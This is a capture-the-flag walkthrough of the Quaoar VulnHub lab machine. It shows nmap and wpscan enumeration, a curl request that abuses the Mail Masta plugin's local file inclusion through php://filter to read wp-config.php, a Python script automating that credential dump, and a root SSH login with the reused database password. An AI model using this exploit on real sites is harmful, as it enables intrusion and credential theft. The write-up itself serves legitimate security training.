Quaoar Vulnerable-Machine Walkthrough

Quaoar is a vulnerable virtual machine available on Vulnhub.com. It is designed with beginners in mind, and doesn’t require the use of any advanced exploitation techniques.

ENUMERATION

I already knew Quaoar’s IP address (192.168.56.100), as it is displayed when the machine initially boots up. So I began with a standard nmap scan to see what services the machine was running:

nmap -Pn 192.168.56.100

Results:

Nmap scan report for 192.168.56.100
Host is up (0.00052s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
53/tcp  open  domain
80/tcp  open  http
110/tcp open  pop3
139/tcp open  netbios-ssn
143/tcp open  imap
445/tcp open  microsoft-ds
993/tcp open  imaps
995/tcp open  pop3s
MAC Address: 08:00:27:7B:EB:52 (Oracle VirtualBox virtual NIC)

The http server running on port 80 immediately stood out to me, as web applications are a great place to look for low-hanging fruit. After doing a little manual prodding, I noticed that ‘robots.txt’ mentioned the /wordpress/ directory. When hunting for vulnerabilities, WordPress is always a great place to look.

So I decided to run wpscan and enumerate any plugins that may be vulnerable:

wpscan -u http://192.168.56.100/wordpress/ -e vp

Results (truncated):

[!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI)
    Reference: https://wpvulndb.com/vulnerabilities/8609
    Reference: https://cxsecurity.com/issue/WLB-2016080220
    Reference: https://www.exploit-db.com/exploits/40290/

[!] Title: Mail Masta 1.0 - Multiple SQL Injection
    Reference: https://wpvulndb.com/vulnerabilities/8740
    Reference: https://github.com/hamkovic/Mail-Masta-Wordpress-Plugin
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6095
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6096
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6097
    Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6098

A WordPress plugin that has both SQL injection and local file inclusion vulnerabilities? Shocking.

EXPLOITATION

I began messing with the local file inclusion vulnerability and was able to view /etc/passwd, which was a great sign. However, after trying to look at ‘wp-config.php’, I kept getting a blank page returned. I realized the PHP code was executing instead of being displayed in the browser. The work-around? Reading the file through PHP’s php://filter wrapper, which hands it back base-64 encoded instead of executing it.

curl http://192.168.56.100/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php/?pl=php://filter/read=convert.base64-encode/resource=/var/www/wordpress/wp-config.php

This returned a nice block of base-64 encoded text. When decoded, I got this (truncated):

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
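The same trick, scripted, as an added example that is not part of the original write-up: it builds the php://filter URL for the Mail Masta endpoint used above, decodes the base-64 body, and pulls the define() constants out of wp-config.php. The target, plugin path and ‘pl’ parameter come from the walkthrough; the HTTP transport is a pluggable function so the decoding and parsing can be exercised offline against a constructed response (the fake_transport and SAMPLE_CONFIG below are made up for that purpose, not captured from the machine).

```python
"""Dump PHP source through an LFI using the php://filter wrapper.

Added example for the Quaoar walkthrough, not code from the original post.
"""
import base64
import re
import urllib.request

# Values taken from the walkthrough.
TARGET = "http://192.168.56.100/wordpress"
LFI_PATH = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"
PARAM = "pl"


def filter_url(resource, base=TARGET):
    """Build the LFI URL that returns `resource` base64-encoded.

    Wrapping the path in php://filter/convert.base64-encode makes PHP emit
    the file's bytes instead of executing them, which is why a direct
    include of wp-config.php came back as a blank page.
    """
    wrapper = f"php://filter/read=convert.base64-encode/resource={resource}"
    return f"{base}{LFI_PATH}?{PARAM}={wrapper}"


def fetch(url):
    """Default transport: plain GET, body returned as text."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def decode_filter_response(body):
    """Extract and decode the base64 blob the filter wrapper emitted.

    The vulnerable script may print other output around the included file,
    so take the longest run of base64 characters rather than decoding the
    whole body. An unreadable or missing file yields no blob at all.
    """
    runs = re.findall(r"[A-Za-z0-9+/=]{16,}", body)
    if not runs:
        raise ValueError("no base64 payload in response; file not readable?")
    blob = max(runs, key=len)
    return base64.b64decode(blob).decode("utf-8", "replace")


# Matches define('NAME', 'value'); allowing escaped quotes inside the value.
DEFINE_RE = re.compile(r"define\(\s*'([A-Z_]+)'\s*,\s*'((?:[^'\\]|\\.)*)'\s*\)")


def wp_defines(php_source):
    """Return the string constants defined in a wp-config.php as a dict."""
    return {k: v.replace("\\'", "'") for k, v in DEFINE_RE.findall(php_source)}


def dump_wp_config(resource="/var/www/wordpress/wp-config.php", transport=fetch):
    """Fetch wp-config.php via the LFI and return its define() constants."""
    body = transport(filter_url(resource))
    return wp_defines(decode_filter_response(body))


# Constructed sample (not a real capture): the truncated wp-config.php shown
# in the write-up, as the endpoint would return it, base64-encoded.
SAMPLE_CONFIG = """<?php
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
"""
SAMPLE_RESPONSE = base64.b64encode(SAMPLE_CONFIG.encode()).decode()


def fake_transport(url):
    """Offline stand-in for fetch(): serves the constructed response."""
    assert "php://filter" in url, "expected a filter-wrapped LFI request"
    return SAMPLE_RESPONSE


if __name__ == "__main__":
    # Swap fake_transport for fetch to run it against the real machine.
    creds = dump_wp_config(transport=fake_transport)
    print(f"{creds['DB_USER']}:{creds['DB_PASSWORD']}")
```

The longest-run heuristic in decode_filter_response matters in practice: a page that wraps the included file in HTML, or a PHP warning printed before it, would otherwise corrupt the base64 and the decode would fail or return garbage.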

I noticed that the MySQL username was ‘root’, which was odd. On a whim, I tried using these credentials to SSH into the server:

root@windows-vista:~# ssh 192.168.56.100 -l root
root@192.168.56.100's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue Mar 28 19:47:10 EDT 2017

  System load:  0.0               Processes:             98
  Usage of /:   31.8% of 7.21GB   Users logged in:       0
  Memory usage: 23%               IP address for eth0:   192.168.56.100
  Swap usage:   0%                IP address for virbr0: 192.168.122.1

  Graph this data and manage this system at https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Mar 26 19:47:06 2017
root@Quaoar:~#

And there we have it, root privileges.

FLAGS

The first flag I found was located in root’s home directory:

root@Quaoar:~# pwd
/root
root@Quaoar:~# cat flag.txt 
8e3f9ec016e3598c5eec11fd3d73f6fb
root@Quaoar:~#

I found the second flag in the ‘/home/wpadmin/’ directory with the help of the ‘locate’ command:

root@Quaoar:~# locate flag.txt
/home/wpadmin/flag.txt
/root/flag.txt
root@Quaoar:~# cat /home/wpadmin/flag.txt 
2bafe61f03117ac66a73c3c514de796e
root@Quaoar:~#

This machine has a third flag, but I wasn’t too interested in searching for it.

CONCLUSION

This was a quick and easy machine. After I finished, I read a few other write-ups and realized I had missed a pretty important detail: WordPress’ admin account used “admin:admin” credentials. Had I tried that first, I could have easily logged in to WordPress and used a PHP webshell to gain access to the server. However, in hindsight, it was more fun to exploit Mail Masta’s local file inclusion vulnerability and dump the wp-config.php file with the help of some base-64 encoding.

Thanks for reading!

Quaoar vulnerable machine from vulnhub.com